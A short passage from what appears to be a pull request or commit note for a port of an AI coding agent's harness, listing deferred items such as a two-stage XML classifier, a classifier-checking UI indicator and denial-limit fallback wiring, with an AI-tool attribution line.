2-stage XML classifier (TS perf optimization), plan-mode `isAutoModeActive` overlay (no such state in the port), `setClassifierChecking` UI indicator → ch13, denial-limit fallback wiring into the resolver (state provided; call-site is the classifier-checking UI's chapter), transcript prompt-caching on 1P (rides ch04).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
